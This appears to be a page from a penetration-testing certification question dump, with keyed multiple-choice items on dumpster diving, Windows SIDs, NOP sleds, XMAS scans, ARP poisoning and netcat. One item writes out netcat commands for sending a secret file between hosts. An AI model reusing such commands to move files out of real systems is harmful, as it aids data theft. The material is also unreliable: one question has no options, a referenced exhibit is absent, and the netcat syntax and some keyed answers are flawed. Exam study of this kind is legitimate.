Topic 22, Penetration Testing Methodologies
A Successfully Attack by a malicious hacker can divide into five phases, Match the
order:
Joel and her team have been going through tons of garbage, recycled paper, and
other rubbish in order to find some information about the target they are attempting
to penetrate.
What would you call this kind of activity?
A.
CI Gathering
B.
Scanning
C.
Dumpster Diving
D.
Garbage Scooping
Dumpster Diving
A client has approached you with a penetration test requirements. They are
concerned with the possibility of external threat, and have invested considerable
resources in protecting their Internet exposure. However, their main concern is the
possibility of an employee elevating his/her privileges and gaining access to
information outside of their respective department.
What kind of penetration test would you recommend that would best address the
clients concern?
A.
A Black Box test
B.
A Black Hat test
C.
A Grey Box test
D.
A Grey Hat test
E.
A White Box test
F.
A White Hat test
A Grey Box test
Peter extracts the SIDs list from Windows 2000 Server machine using the hacking
tool “SIDExtractor”. Here is the output of the SIDs:
s-1-5-21-1125394485-807628933-54978560-100Johns
s-1-5-21-1125394485-807628933-54978560-652Rebecca
s-1-5-21-1125394485-807628933-54978560-412Sheela
s-1-5-21-1125394485-807628933-54978560-999Shawn
s-1-5-21-1125394485-807628933-54978560-777Somia
s-1-5-21-1125394485-807628933-54978560-500chang
s-1-5-21-1125394485-807628933-54978560-555Micah
From the above list identify the user account with System Administrator privileges.
A.
John
B.
Rebecca
C.
Sheela
D.
Shawn
E.
Somia
F.
Chang
G.
Micah
Chang
Explanation: The SID of the built-in administrator will always follow this example: S-1-5-
domain-500
Exhibit:
Based on the following extract from the log of a compromised machine, what is the
hacker really trying to steal?
A.
har.txt
B.
SAM file
C.
wwwroot
D.
Repair file
SAM file
Explanation: He is actually trying to get the file har.txt but this file contains a copy of the
SAM file.
You are programming a buffer overflow exploit and you want to create a NOP sled of 200
bytes in the program exploit.c
What is the hexadecimal value of NOP instruction?
A.
0x60
B.
0x80
C.
0x70
D.
0x90
0x90
MX record priority increases as the number increases.(True/False.
A.
True
B.
False
False
Explanation: The highest priority MX record has the lowest number.
How do you defend against MAC attacks on a switch?
A.
Disable SPAN port on the switch
B.
Enable SNMP Trap on the switch
C.
Configure IP security on the switch
D.
Enable Port Security on the switch
Enable Port Security on the switch
Blane is a network security analyst for his company. From an outside IP, Blane performs an
XMAS scan using Nmap. Almost every port scanned does not illicit a response. What can
he infer from this kind of response?
A.
AThese ports are open because they do not illicit a response.
B.
He can tell that these ports are in stealth mode.
C.
If a port does not respond to an XMAS scan using NMAP, that port is closed.
D.
The scan was not performed correctly using NMAP since all ports, no matter what their
state, will illicit some sort of response from an XMAS scan.
AThese ports are open because they do not illicit a response.
In which part of OSI layer, ARP Poisoning occurs?
A.
Transport Layer
B.
Datalink Layer
C.
Physical Layer
D.
Application layer
Datalink Layer
You are the Security Administrator of Xtrinity, Inc. You write security policies and
conduct assesments to protect the company's network. During one of your periodic
checks to see how well policy is being observed by the employees, you discover an
employee has attached a modem to his telephone line and workstation. He has used
this modem to dial in to his workstation, thereby bypassing your firewall. A security
breach has occurred as a direct result of this activity. The employee explains that he
used the modem because he had to download software for a department project.
How would you resolve this situation?
A.
Reconfigure the firewall
B.
Conduct a needs analysis
C.
Install a network-based IDS
D.
Enforce the corporate security policy
Enforce the corporate security policy
Explanation: The security policy is meant to always be followed until changed. If a need
rises to perform actions that might violate the security policy you’ll have to find another way
to accomplish the task or wait until the policy has been changed.
An attacker runs netcat tool to transfer a secret file between two hosts.
Machine A: netcat -l -p 1234 < secretfile
Machine B: netcat 192.168.3.4 > 1234
He is worried about information being sniffed on the network. How would the
attacker use netcat to encrypt the information before transmitting onto the wire?
A.
Machine A: netcat -l -p -s password 1234 < testfileMachine B: netcat <machine A IP>
1234
B.
Machine A: netcat -l -e magickey -p 1234 < testfileMachine B: netcat <machine A IP>
1234
C.
Machine A: netcat -l -p 1234 < testfile -pw passwordMachine B: netcat <machine A IP>
1234 -pw password
D.
Use cryptcat instead of netcat
Use cryptcat instead of netcat
Explanation: Netcat cannot encrypt the file transfer itself but would need to use a third
party application to encrypt/decrypt like openssl. Cryptcat is the standard netcat enhanced
with twofish encryption.
| Page 24 out of 64 Pages |
| Previous |